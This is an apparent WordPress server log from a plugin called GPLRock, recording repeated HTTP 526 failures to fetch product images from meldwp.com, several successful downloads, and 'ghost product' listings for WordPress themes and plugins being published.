01:17:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nexo-print-server-5186.webp for product nexo-print-server after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:47 UTC] GPLRock WARNING: Image download failed for product nexo-print-server. URL: https://meldwp.com/wp-content/uploads/nexo-print-server-5186.webp [05-Apr-2026 01:17:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nexo-print-server [05-Apr-2026 01:17:47 UTC] GPLRock: Image download failed for product green-lines-for-wordpress-manage-and-sell-ad-lines (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:49 UTC] GPLRock: Image download failed for product green-lines-for-wordpress-manage-and-sell-ad-lines (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/green-lines-for-wordpress---manage-and-sell-ad-lines-26182.webp for product green-lines-for-wordpress-manage-and-sell-ad-lines after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:52 UTC] GPLRock: Image download failed for product green-lines-for-wordpress-manage-and-sell-ad-lines (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:54 UTC] GPLRock: Image download failed for product green-lines-for-wordpress-manage-and-sell-ad-lines (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/green-lines-for-wordpress---manage-and-sell-ad-lines-26182.webp for product green-lines-for-wordpress-manage-and-sell-ad-lines after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:56 UTC] GPLRock WARNING: Image download failed for product green-lines-for-wordpress-manage-and-sell-ad-lines. URL: https://meldwp.com/wp-content/uploads/green-lines-for-wordpress---manage-and-sell-ad-lines-26182.webp [05-Apr-2026 01:17:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: green-lines-for-wordpress-manage-and-sell-ad-lines [05-Apr-2026 01:17:56 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-image-with-arrow (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:58 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-image-with-arrow (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---image-with-arrow-8520.webp for product wpbakery-page-builder-add-on-image-with-arrow after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:18:01 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-image-with-arrow (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:03 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-image-with-arrow (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---image-with-arrow-8520.webp for product wpbakery-page-builder-add-on-image-with-arrow after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:18:05 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-image-with-arrow. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---image-with-arrow-8520.webp [05-Apr-2026 01:18:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-add-on-image-with-arrow [05-Apr-2026 01:18:05 UTC] GPLRock: Image download failed for product menu-by-user-role-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:07 UTC] GPLRock: Image download failed for product menu-by-user-role-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/menu-by-user-role-for-wordpress-25568.webp for product menu-by-user-role-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:18:09 UTC] GPLRock: Image download failed for product menu-by-user-role-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:11 UTC] GPLRock: Image download failed for product menu-by-user-role-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/menu-by-user-role-for-wordpress-25568.webp for product menu-by-user-role-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:18:13 UTC] GPLRock WARNING: Image download failed for product menu-by-user-role-for-wordpress. URL: https://meldwp.com/wp-content/uploads/menu-by-user-role-for-wordpress-25568.webp [05-Apr-2026 01:18:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: menu-by-user-role-for-wordpress [05-Apr-2026 01:18:40 UTC] GPLRock: Image download failed for product arisen-charity-multipurpose-responsive-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:42 UTC] GPLRock: Image download failed for product arisen-charity-multipurpose-responsive-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arisen---charity-multipurpose-responsive-one-page-wordpress-theme-7764.webp for product arisen-charity-multipurpose-responsive-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:18:44 UTC] GPLRock: Image download failed for product arisen-charity-multipurpose-responsive-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:47 UTC] GPLRock: Image download failed for product arisen-charity-multipurpose-responsive-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arisen---charity-multipurpose-responsive-one-page-wordpress-theme-7764.webp for product arisen-charity-multipurpose-responsive-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:18:49 UTC] GPLRock WARNING: Image download failed for product arisen-charity-multipurpose-responsive-one-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/arisen---charity-multipurpose-responsive-one-page-wordpress-theme-7764.webp [05-Apr-2026 01:18:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arisen-charity-multipurpose-responsive-one-page-wordpress-theme [05-Apr-2026 01:18:49 UTC] GPLRock: Image download failed for product itechie-it-solutions-and-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:51 UTC] GPLRock: Image download failed for product itechie-it-solutions-and-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/itechie---it-solutions-and-services-wordpress-theme-31091.webp for product itechie-it-solutions-and-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:18:53 UTC] GPLRock: Image download failed for product itechie-it-solutions-and-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:55 UTC] GPLRock: Image download failed for product itechie-it-solutions-and-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:18:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/itechie---it-solutions-and-services-wordpress-theme-31091.webp for product itechie-it-solutions-and-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:18:57 UTC] GPLRock WARNING: Image download failed for product itechie-it-solutions-and-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/itechie---it-solutions-and-services-wordpress-theme-31091.webp [05-Apr-2026 01:18:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: itechie-it-solutions-and-services-wordpress-theme [05-Apr-2026 01:18:58 UTC] GPLRock: Image download failed for product castel-single-property-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:00 UTC] GPLRock: Image download failed for product castel-single-property-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/castel--single-property--real-estate-wordpress-theme-10481.webp for product castel-single-property-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:02 UTC] GPLRock: Image download failed for product castel-single-property-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:04 UTC] GPLRock: Image download failed for product castel-single-property-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/castel--single-property--real-estate-wordpress-theme-10481.webp for product castel-single-property-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:06 UTC] GPLRock WARNING: Image download failed for product castel-single-property-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/castel--single-property--real-estate-wordpress-theme-10481.webp [05-Apr-2026 01:19:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: castel-single-property-real-estate-wordpress-theme [05-Apr-2026 01:19:06 UTC] GPLRock: Image download failed for product papr-newspaper-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:08 UTC] GPLRock: Image download failed for product papr-newspaper-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/papr---newspaper-news-wordpress-theme-1214.webp for product papr-newspaper-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:11 UTC] GPLRock: Image download failed for product papr-newspaper-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:13 UTC] GPLRock: Image download failed for product papr-newspaper-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/papr---newspaper-news-wordpress-theme-1214.webp for product papr-newspaper-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:15 UTC] GPLRock WARNING: Image download failed for product papr-newspaper-news-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/papr---newspaper-news-wordpress-theme-1214.webp [05-Apr-2026 01:19:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: papr-newspaper-news-wordpress-theme [05-Apr-2026 01:19:15 UTC] GPLRock: Image download failed for product zoacres-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:17 UTC] GPLRock: Image download failed for product zoacres-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zoacres---real-estate-wordpress-theme-24665.webp for product zoacres-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:19 UTC] GPLRock: Image download failed for product zoacres-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:21 UTC] GPLRock: Image download failed for product zoacres-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zoacres---real-estate-wordpress-theme-24665.webp for product zoacres-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:23 UTC] GPLRock WARNING: Image download failed for product zoacres-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zoacres---real-estate-wordpress-theme-24665.webp [05-Apr-2026 01:19:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zoacres-real-estate-wordpress-theme [05-Apr-2026 01:19:24 UTC] GPLRock: Image download failed for product mowasalat-logistic-and-transports-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:26 UTC] GPLRock: Image download failed for product mowasalat-logistic-and-transports-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mowasalat---logistic-and-transports-wp-theme-1338.webp for product mowasalat-logistic-and-transports-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:28 UTC] GPLRock: Image download failed for product mowasalat-logistic-and-transports-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:30 UTC] GPLRock: Image download failed for product mowasalat-logistic-and-transports-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mowasalat---logistic-and-transports-wp-theme-1338.webp for product mowasalat-logistic-and-transports-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:32 UTC] GPLRock WARNING: Image download failed for product mowasalat-logistic-and-transports-wp-theme. URL: https://meldwp.com/wp-content/uploads/mowasalat---logistic-and-transports-wp-theme-1338.webp [05-Apr-2026 01:19:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mowasalat-logistic-and-transports-wp-theme [05-Apr-2026 01:19:32 UTC] GPLRock: Image download failed for product wpcloud-creative-one-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:34 UTC] GPLRock: Image download failed for product wpcloud-creative-one-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpcloud---creative-one-page-theme-906.webp for product wpcloud-creative-one-page-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:37 UTC] GPLRock: Image download failed for product wpcloud-creative-one-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:39 UTC] GPLRock: Image download failed for product wpcloud-creative-one-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpcloud---creative-one-page-theme-906.webp for product wpcloud-creative-one-page-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:41 UTC] GPLRock WARNING: Image download failed for product wpcloud-creative-one-page-theme. URL: https://meldwp.com/wp-content/uploads/wpcloud---creative-one-page-theme-906.webp [05-Apr-2026 01:19:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpcloud-creative-one-page-theme [05-Apr-2026 01:19:41 UTC] GPLRock: Image download failed for product resolace-psychology-counseling-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:43 UTC] GPLRock: Image download failed for product resolace-psychology-counseling-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/resolace--psychology--counseling-fse-wordpress-theme-14856.webp for product resolace-psychology-counseling-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:46 UTC] GPLRock: Image download failed for product resolace-psychology-counseling-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:48 UTC] GPLRock: Image download failed for product resolace-psychology-counseling-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/resolace--psychology--counseling-fse-wordpress-theme-14856.webp for product resolace-psychology-counseling-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:50 UTC] GPLRock WARNING: Image download failed for product resolace-psychology-counseling-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/resolace--psychology--counseling-fse-wordpress-theme-14856.webp [05-Apr-2026 01:19:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: resolace-psychology-counseling-fse-wordpress-theme [05-Apr-2026 01:19:50 UTC] GPLRock: Image download failed for product bluerack-modern-hosting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:52 UTC] GPLRock: Image download failed for product bluerack-modern-hosting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bluerack---modern-hosting-wordpress-theme-27658.webp for product bluerack-modern-hosting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:54 UTC] GPLRock: Image download failed for product bluerack-modern-hosting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:56 UTC] GPLRock: Image download failed for product bluerack-modern-hosting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:19:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bluerack---modern-hosting-wordpress-theme-27658.webp for product bluerack-modern-hosting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:19:59 UTC] GPLRock WARNING: Image download failed for product bluerack-modern-hosting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bluerack---modern-hosting-wordpress-theme-27658.webp [05-Apr-2026 01:19:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bluerack-modern-hosting-wordpress-theme [05-Apr-2026 01:19:59 UTC] GPLRock: Image download failed for product picante-restaurant-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:20:01 UTC] GPLRock: Image download failed for product picante-restaurant-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:20:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/picante--restaurant-wordpress-20467.webp for product picante-restaurant-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:20:03 UTC] GPLRock: Image download failed for product picante-restaurant-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:20:05 UTC] GPLRock: Image download failed for product picante-restaurant-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:20:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/picante--restaurant-wordpress-20467.webp for product picante-restaurant-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:20:07 UTC] GPLRock WARNING: Image download failed for product picante-restaurant-wordpress. URL: https://meldwp.com/wp-content/uploads/picante--restaurant-wordpress-20467.webp [05-Apr-2026 01:20:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: picante-restaurant-wordpress [05-Apr-2026 01:20:41 UTC] GPLRock: Image downloaded successfully for product facebook-chat-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47b95f09.jpg [05-Apr-2026 01:20:41 UTC] GPLRock: Using pre-downloaded image for product facebook-chat-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47b95f09.jpg [05-Apr-2026 01:20:41 UTC] GPLRock: Ghost product published with image - Product ID: facebook-chat-for-amp [05-Apr-2026 01:20:43 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-add-to-cart-popup-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-821709c8.jpg [05-Apr-2026 01:20:43 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-add-to-cart-popup-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-821709c8.jpg [05-Apr-2026 01:20:43 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-add-to-cart-popup-addon [05-Apr-2026 01:20:45 UTC] GPLRock: Image downloaded successfully for product outdoor-creative-photography-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-01e753ab.jpg [05-Apr-2026 01:20:45 UTC] GPLRock: Using pre-downloaded image for product outdoor-creative-photography-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-01e753ab.jpg [05-Apr-2026 01:20:45 UTC] GPLRock: Ghost product published with image - Product ID: outdoor-creative-photography-portfolio-wordpress-theme [05-Apr-2026 01:20:46 UTC] GPLRock: Image downloaded successfully for product woocommerce-cheapest-most-expensive-product-promotions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f66d7c8.jpg [05-Apr-2026 01:20:46 UTC] GPLRock: Using pre-downloaded image for product woocommerce-cheapest-most-expensive-product-promotions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f66d7c8.jpg [05-Apr-2026 01:20:46 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-cheapest-most-expensive-product-promotions [05-Apr-2026 01:20:48 UTC] GPLRock: Image downloaded successfully for product podium-model-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3600a2a2.jpg [05-Apr-2026 01:20:48 UTC] GPLRock: Using pre-downloaded image for product podium-model-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3600a2a2.jpg [05-Apr-2026 01:20:48 UTC] GPLRock: Ghost product published with image - Product ID: podium-model-agency-wordpress-theme [05-Apr-2026 01:20:49 UTC] GPLRock: Image downloaded successfully for product bbpress-forums-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40ae2dc0.jpg [05-Apr-2026 01:20:49 UTC] GPLRock: Using pre-downloaded image for product bbpress-forums-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40ae2dc0.jpg [05-Apr-2026 01:20:49 UTC] GPLRock: Ghost product published with image - Product ID: bbpress-forums-for-amp [05-Apr-2026 01:20:51 UTC] GPLRock: Image downloaded successfully for product ailsa-personal-blog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27c17f47.png [05-Apr-2026 01:20:51 UTC] GPLRock: Using pre-downloaded image for product ailsa-personal-blog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27c17f47.png [05-Apr-2026 01:20:51 UTC] GPLRock: Ghost product published with image - Product ID: ailsa-personal-blog-wordpress-theme [05-Apr-2026 01:20:53 UTC] GPLRock: Image downloaded successfully for product reco-minimal-theme-for-freebies (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c35e5e6c.jpg [05-Apr-2026 01:20:53 UTC] GPLRock: Using pre-downloaded image for product reco-minimal-theme-for-freebies: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c35e5e6c.jpg [05-Apr-2026 01:20:53 UTC] GPLRock: Ghost product published with image - Product ID: reco-minimal-theme-for-freebies [05-Apr-2026 01:20:55 UTC] GPLRock: Image downloaded successfully for product zoomsounds-wordpress-wave-audio-player (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dda38d6a.avif [05-Apr-2026 01:20:55 UTC] GPLRock: Using pre-downloaded image for product zoomsounds-wordpress-wave-audio-player: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dda38d6a.avif [05-Apr-2026 01:20:55 UTC] GPLRock: Ghost product published with image - Product ID: zoomsounds-wordpress-wave-audio-player [05-Apr-2026 01:20:56 UTC] GPLRock: Image downloaded successfully for product cryptcio-innovative-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05689905.jpg [05-Apr-2026 01:20:56 UTC] GPLRock: Using pre-downloaded image for product cryptcio-innovative-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05689905.jpg [05-Apr-2026 01:20:56 UTC] GPLRock: Ghost product published with image - Product ID: cryptcio-innovative-wordpress-theme [05-Apr-2026 01:22:39 UTC] GPLRock: Image download failed for product locus-photography-one-page-bootstrap-5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:42 UTC] GPLRock: Image download failed for product locus-photography-one-page-bootstrap-5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/locus---photography-one-page-bootstrap-5-template-7108.webp for product locus-photography-one-page-bootstrap-5-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:22:44 UTC] GPLRock: Image download failed for product locus-photography-one-page-bootstrap-5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:46 UTC] GPLRock: Image download failed for product locus-photography-one-page-bootstrap-5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/locus---photography-one-page-bootstrap-5-template-7108.webp for product locus-photography-one-page-bootstrap-5-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:22:48 UTC] GPLRock WARNING: Image download failed for product locus-photography-one-page-bootstrap-5-template. URL: https://meldwp.com/wp-content/uploads/locus---photography-one-page-bootstrap-5-template-7108.webp [05-Apr-2026 01:22:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: locus-photography-one-page-bootstrap-5-template [05-Apr-2026 01:22:48 UTC] GPLRock: Image download failed for product olars-candle-handmade-shop-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:50 UTC] GPLRock: Image download failed for product olars-candle-handmade-shop-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/olars---candle-handmade-shop-wordpress-woocommerce-theme-24775.webp for product olars-candle-handmade-shop-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:22:52 UTC] GPLRock: Image download failed for product olars-candle-handmade-shop-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:54 UTC] GPLRock: Image download failed for product olars-candle-handmade-shop-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/olars---candle-handmade-shop-wordpress-woocommerce-theme-24775.webp for product olars-candle-handmade-shop-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:22:57 UTC] GPLRock WARNING: Image download failed for product olars-candle-handmade-shop-wordpress-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/olars---candle-handmade-shop-wordpress-woocommerce-theme-24775.webp [05-Apr-2026 01:22:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: olars-candle-handmade-shop-wordpress-woocommerce-theme [05-Apr-2026 01:22:57 UTC] GPLRock: Image download failed for product infocenter-knowledge-base-and-qa-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:22:59 UTC] GPLRock: Image download failed for product infocenter-knowledge-base-and-qa-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infocenter---knowledge-base-and-qa-wordpress-theme-3606.webp for product infocenter-knowledge-base-and-qa-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:01 UTC] GPLRock: Image download failed for product infocenter-knowledge-base-and-qa-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:03 UTC] GPLRock: Image download failed for product infocenter-knowledge-base-and-qa-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infocenter---knowledge-base-and-qa-wordpress-theme-3606.webp for product infocenter-knowledge-base-and-qa-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:05 UTC] GPLRock WARNING: Image download failed for product infocenter-knowledge-base-and-qa-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/infocenter---knowledge-base-and-qa-wordpress-theme-3606.webp [05-Apr-2026 01:23:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infocenter-knowledge-base-and-qa-wordpress-theme [05-Apr-2026 01:23:05 UTC] GPLRock: Image download failed for product manggis-creative-portfolio-wordpress-theme 